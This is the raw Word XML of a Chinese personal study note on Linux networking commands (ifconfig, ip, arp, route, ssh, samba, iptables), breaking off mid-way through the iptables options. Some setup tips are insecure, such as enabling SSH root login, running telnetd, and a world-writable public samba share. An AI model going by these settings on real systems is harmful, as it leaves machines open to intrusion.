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06-网络模块</w:t>
      </w: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3180" w:type="dxa"/>
            <w:tcBorders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名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="120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所有者</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950" w:type="dxa"/>
            <w:tcBorders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修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950" w:type="dxa"/>
            <w:tcBorders>
              <w:lef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rPr>
                <w:b w:val="true"/>
              </w:rPr>
              <w:t>创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:tcBorders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4">
              <w:r>
                <w:rPr>
                  <w:color w:val="3370ff"/>
                </w:rPr>
                <w:t>07-网卡设置</w:t>
              </w:r>
            </w:hyperlink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李2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom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08:54</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom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08:51</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:tcBorders>
              <w:top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hyperlink r:id="rId5">
              <w:r>
                <w:rPr>
                  <w:color w:val="3370ff"/>
                </w:rPr>
                <w:t>08-网络协议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李2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:righ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09:13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>2024-05-14 08:52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网络模块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ssl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websocket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rpc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查询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1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>网络查询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1.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>ifconfig命令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ifconfig -a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12287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ens33: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500</w:t>
              <w:br/>
              <w:t>ens33            网卡名称</w:t>
              <w:br/>
              <w:t>UP               表示“接口已启用”</w:t>
              <w:br/>
              <w:t>BROADCAST        表示“主机支持广播”</w:t>
              <w:br/>
              <w:t>RUNNING          表示“接口在工作中”</w:t>
              <w:br/>
              <w:t>MULTICAST        表示“主机支持多播”</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MTU 1500        （最大传输单元）：1500字节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inet 192.168.xxx.xxx  netmask 255.255.255.0  broadcast 192.168.xxx.xxx</w:t>
              <w:br/>
              <w:t>inet：             IP地址</w:t>
              <w:br/>
              <w:t>netmask：          子网掩码</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>broadcast：        广播地址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mac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ether 00:50:56:28:2c:xx  txqueuelen 1000  (Ethernet)</w:t>
              <w:br/>
              <w:t>ether（Ethernet）                    ：        表示 连接类型（以太网）</w:t>
              <w:br/>
              <w:t>00:50:56:28:2c:xx（Hwaddr）          ：        表示 硬件Mac 地址</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>txqueuelen 1000                     ：        表示 网卡传送队列长度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RX packets                 接受到的总包数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RX bytes                     接受到的总字节数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RX errors                    接收时，产生错误的数据包数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RX dropped                接收时，丢弃的数据包数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RX overruns               接收时，由于速度过快而丢失的数据包数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RX frame (框架)          接收时，发生frame错误而丢失的数据包数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TX packets                 发送的总包数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TX bytes                     发送的总字节数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TX errors                    发送时，产生错误的数据包数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TX dropped                发送时，丢弃的数据包数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TX overruns               发送时，由于速度过快而丢失的数据包数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TX carrier                   发送时， 发生carrier错误而丢失的数据包数（运输工具）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TX collisions               发送时， 冲突信息包的数目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1.1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>netstat命令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netstat –natu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6045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-a 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显示所有选项，默认不显示listen相关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-t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(tcp)  仅显示tcp相关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-u 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(udp）仅显示udp相关选项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-n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拒绝显示别名， 能显示数字的全部转化成数字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-l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仅列出有在listen（监听）的服务状态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-p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显示建立相关连接的程序名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-r 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显示路由信息， 路由表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-e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显示扩展信息， 例如uid等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-s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按每个协议进行统计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-c </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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每隔一个固定时间， 执行该netstat命令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1.1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>ip命令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370"/>
        <w:gridCol w:w="5040"/>
      </w:tblGrid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ip addr：</w:t>
            </w:r>
          </w:p>
        </w:tc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显示和管理网络接口的IP地址和相关信息。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ip link：        </w:t>
            </w:r>
          </w:p>
        </w:tc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显示和管理网络接口的状态和属性。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ip route：</w:t>
            </w:r>
          </w:p>
        </w:tc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显示和管理路由表。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ip neigh：</w:t>
            </w:r>
          </w:p>
        </w:tc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显示和管理邻居表，即ARP缓存。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ip tunnel：</w:t>
            </w:r>
          </w:p>
        </w:tc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管理网络隧道。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ip link set：</w:t>
            </w:r>
          </w:p>
        </w:tc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配置网络接口的状态和属性。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ip addr add/del：</w:t>
            </w:r>
          </w:p>
        </w:tc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添加或删除IP地址。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ip route add/del：</w:t>
            </w:r>
          </w:p>
        </w:tc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添加或删除路由。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路由</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>arp工具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2.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>arp命令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510"/>
        <w:gridCol w:w="4770"/>
      </w:tblGrid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解释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-a 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使用备用 BSD 样式输出格式（没有固定列）。 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-H，--hw-type, -t &lt;type&gt;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指定arp指令使用的地址类型。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-d &lt;address&gt;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从 arp 缓存中删除指定主机的 arp 条目。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-D,--use-device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使用指定接口的硬件地址。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-e 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以 Linux 的显示风格显示 arp 缓存中的条目。   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-i,--device &lt;if&gt;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指定要操作 arp 缓存的网络接口。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-n,--numeric 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以数字方式显示 arp 缓存中的条目。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-v, --verbose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显示详细的arp缓存条目，包括缓存条目的统计信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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-f, --file &lt;filename&gt; </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="47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设置主机的IP地址与 MAC 地址的静态映射。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2.1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>arp常用用法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 和 MAC 地址绑定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arp -s 172.16.0.76 00:50:56:26:d8:87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 ARP 缓存表中指定项。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arp -d 169.254.0.47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删除指定网卡的 arp 表。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arp -i eth0 -d 169.254.0.4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eth1 的 MAC 地址回答 eth0 上的 192.168.60.2 的 arp 请求。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arp -i eth0 -Ds 192.168.60.2 eth1 pub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显示详细的 arp 缓存条目，包括缓存条目的统计信息。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arp -v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color w:val="3370ff"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>route工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>route命令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删除默认网关</w:t>
              <w:br/>
              <w:t>sudo route del default gw 192.168.188.1</w:t>
              <w:br/>
              <w:br/>
              <w:t>查看路由</w:t>
              <w:br/>
              <w:t>ip route show</w:t>
              <w:br/>
              <w:t>添加默认路由</w:t>
              <w:br/>
              <w:t>sudo ip route add default via 172.31.3.193</w:t>
              <w:br/>
              <w:t>删除默认路由</w:t>
              <w:br/>
              <w:t>sudo ip route del default</w:t>
              <w:br/>
              <w:t>添加备用路由</w:t>
              <w:br/>
              <w:t>sudo ip route add default via 172.31.3.193</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo ip route add default via 172.31.60.54 dev mgbe3_0.60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当二块网卡只走eth0，不走wlan0时，可以进行删除eth0只走wlan0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2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>ip命令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查看命令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ifconfig    #lin</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ipconfig    #win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关闭和开启命令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ifconfig eth1 down</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo ifconfig eth1 up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设置MAC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ifconfig eth1 hw ether aa:bb:cc:dd:ee:21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给物理网口eth1配置vlan id为3 ip地址为172.20.3.34/24 的vlan网口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ip addr add 172.20.3.34/24 dev eth1.3</w:t>
              <w:br/>
              <w:t>sudo ip link set dev eth1.3 down</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo ip link set dev eth1.3 up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使用指定网口ping命令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ping -I eth1.3 172.20.3.40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3" w:id="13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远程工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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sz w:val="32"/>
        </w:rPr>
        <w:t>telnetd 工具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telnetd -p 888 开另外一个shell 192.168.225.21的(888端口号)</w:t>
              <w:br/>
              <w:t>然后再ubuntu端</w:t>
              <w:br/>
              <w:t>telnet 192.168.225.1 888</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>在输入用户密码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3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>ssh工具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ssh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ssh 127.0.0.1</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ssh pi@192.168.10.106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scp文件拷贝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scp filename username@ip_address:/home/username</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>rsync filename username@ip_address:/home/username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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>kail开启ssh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1.1配置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vim /etc/ssh/sshd_config    # sshd_config服务端配置文件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开启下面几项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port 22</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>PermitRootLogin yes    # 允许通过root用户通过ssh登陆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vim /etc/ssh/ssh_config     # ssh_config客户端配置文件</w:t>
              <w:br/>
              <w:t>在ssh_config配置文件中开启允许密码自动验证（是否允许口令验证，可设可不设）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PasswordAuthentication yes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systemctl restart ssh.service</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>update-rc.d ssh enable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https://blog.csdn.net/WJ_11_13/article/details/127326185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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>树莓派开启ssh</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>ubuntu开启ssh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检查是否有ssh环境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ps -e | grep ssh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agent含义代表为客户端，需要安装的为服务端sshd，说明需要安装ssh环境。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安装ssh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apt-get install ssh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启动ssh服务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/etc/init.d/ssh start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再次查看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4000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br/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color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>出现过问题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ssh登陆不上重新卸载安装(安装sshd)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1、彻底卸载ssh服务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purge openssh-server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2、更新源列表（可以安装最新的SSH服务）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update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3、安装SSH服务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install openssh-server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输入以下命令系统会自动进行ssh服务的安装。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4、安装完SSH服务之后的第一步就是打开SSH服务sudo /etc/init.d/ssh start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/etc/init.d/ssh start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color w:val="3370ff"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>ftp工具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install vsftpd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vi /etc/vsftpd.conf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/etc/init.d/vsftpd restart</w:t>
              <w:br/>
              <w:t>有的版本可以</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo service vsftpd restart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color w:val="3370ff"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>samba工具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 samba服务器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install samba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sudo vim /etc/samba/smb.conf </w:t>
              <w:br/>
              <w:t xml:space="preserve"> [li_jk]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    path = /home/samba</w:t>
              <w:br/>
              <w:t xml:space="preserve">    available = yes</w:t>
              <w:br/>
              <w:t xml:space="preserve">    vaild user = samba</w:t>
              <w:br/>
              <w:t xml:space="preserve">    public = yes</w:t>
              <w:br/>
              <w:t xml:space="preserve">    browseable = yes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writable = yes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这其中比较重要的参数为path和valid users, path指定了samba服务器的根目录，可以任意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指定合法路径； valid users表示可以访问samba服务器的合法用户；用户在配置时注意需要将路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径改为自己需要的路径，切勿全盘照抄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在/etc/samba/下创建一个名为smbpasswd的文件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touch /etc/samba/smbpasswd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创建一个名为yuan(用户名自己定义)的samba账号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smbpasswd - a yuan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上面命令执行后，输入两次密码samba账户创建完成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sudo service restart smbd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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Samba-windows文件互传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sudo apt-get install samba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sudo apt-get install smbclient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ubuntu路径创建samba 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mkdir /home/samba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cd /home/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chmod 777 samba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windows物理机上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win+R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\\192.168.100.48(虚拟机IP地址)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右键可以添加为虚拟硬盘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color w:val="3370ff"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>安装xshell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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install openssh-server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启动xshell连接命令：/etc/init.d/ssh start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color w:val="3370ff"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>adb工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24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3717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br/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需要设置Winndows环境变量,命令行才能所有地方都可以使用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adb shell  登录</w:t>
              <w:br/>
              <w:t>adb shell root设置root权限</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>adb push xxx xxx推</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>adb pull  xxx  xxx拉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5" w:id="25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网络工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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color w:val="3370ff"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>iptables工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>iptables四表五链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color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>五链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规则链名包括(也被称为五个钩子函数(hook functions))：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INPUT链 ：处理输入数据包。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进入主机的数据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OUTPUT链 ：处理输出数据包。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主机发出去的数据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FORWARD链 ：处理转发数据包。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主机转发的数据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PREROUTING链 ：用于目标地址转换(DNAT)。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数据到达防火墙之前，改变数据的目的地址和目的端口。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作用可以将公网的ip yyy.yyy.yyy.yyy 映射到局域网的 xxx.xxx.xxx.xxx服务器上。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POSTOUTING链 ：用于源地址转换(SNAT)。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数据离开防火墙之后，改变数据的源地址和源端口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color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Filter表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Filter表示iptables的默认表，因此如果你没有自定义表，那么就默认使用filter表，它具有以下三种内建链：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INPUT链 – 处理来自外部的数据。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OUTPUT链 – 处理向外发送的数据。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FORWARD链 – 将数据转发到本机的其他网卡设备上。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color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> NAT表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NAT表有三种内建链：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PREROUTING链 – 处理刚到达本机并在路由转发前的数据包。它会转换数据包中的目标IP地址（destination ip address），通常用于DNAT(destination NAT)。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POSTROUTING链 – 处理即将离开本机的数据包。它会转换数据包中的源IP地址（source ip address），通常用于SNAT（source NAT）。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OUTPUT链 – 处理本机产生的数据包。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1" w:id="31"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.1.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Mangle表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Mangle表用于指定如何处理数据包。它能改变TCP头中的QoS位。Mangle表具有5个内建链：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PREROUTING链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OUTPUT链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FORWARD链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INPUT链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POSTROUTING链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2" w:id="32"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.1.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Raw表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Raw表用于处理异常，它具有2个内建链：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PREROUTING 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OUTPUT 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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>iptables常用选项与参数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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4" w:id="34"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>语法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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iptables(选项)(参数)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5241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5" w:id="35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>选项详解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35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-t, --table table：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对指定的表 table 进行操作， table 必须是 raw， nat，filter，mangle 中的一个。如果不指定此选项，默认的是 filter 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 通用匹配：源地址目标地址的匹配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-p：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指定要匹配的数据包协议类型；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-s, --source [!] address[/mask]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把指定的一个／一组地址作为源地址，按此规则进行过滤。当后面没有 mask 时，address 是一个地址，比如：192.168.1.1；当 mask 指定时，可以表示一组范围内的地址，比如：192.168.1.0/255.255.255.0。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-d, --destination [!] address[/mask]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地址格式同上，但这里是指定地址为目的地址，按此进行过滤。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-i, --in-interface [!] &lt;网络接口name&gt;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指定数据包的来自来自网络接口，比如最常见的 eth0 。注意：它只对 INPUT，FORWARD，PREROUTING 这三个链起作用。如果没有指定此选项， 说明可以来自任何一个网络接口。同前面类似，"!" 表示取反。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-o, --out-interface [!] &lt;网络接口name&gt;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指定数据包出去的网络接口。只对 OUTPUT，FORWARD，POSTROUTING 三个链起作用。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# 查看管理命令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-L, --list [chain] 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列出链 chain 上面的所有规则，如果没有指定链，列出表上所有链的所有规则。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 规则管理命令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-A, --append chain rule-specification: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在指定链 chain 的末尾插入指定的规则，也就是说，这条规则会被放到最后，最后才会被执行。规则是由后面的匹配来指定。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-I, --insert chain [rulenum] rule-specification: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在链 chain 中的指定位置插入一条或多条规则。如果指定的规则号是1，则在链的头部插入。这也是默认的情况，如果没有指定规则号。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-D, --delete chain rule-specification -D, --delete chain rulenum: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在指定的链 chain 中删除一个或多个指定规则。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-R num：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Replays替换/修改第几条规则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# 链管理命令(这都是立即生效的)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-P, --policy chain target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为指定的链 chain 设置策略 target。注意，只有内置的链才允许有策略，用户自定义的是不允许的。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-F, --flush [chain]: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清空指定链 chain 上面的所有规则。如果没有指定链，清空该表上所有链的所有规则。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-N, --new-chain chain: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用指定的名字创建一个新的链。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-X, --delete-chain [chain]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删除指定的链，这个链必须没有被其它任何规则引用，而且这条上必须没有任何规则。如果没有指定链名，则会删除该表中所有非内置的链。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-E, --rename-chain old-chain new-chain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用指定的新名字去重命名指定的链。这并不会对链内部造成任何影响。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-Z, --zero [chain]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把指定链，或者表中的所有链上的所有计数器清零。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-j, --jump target &lt;指定目标&gt; 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即满足某条件时该执行什么样的动作。target 可以是内置的目标，比如 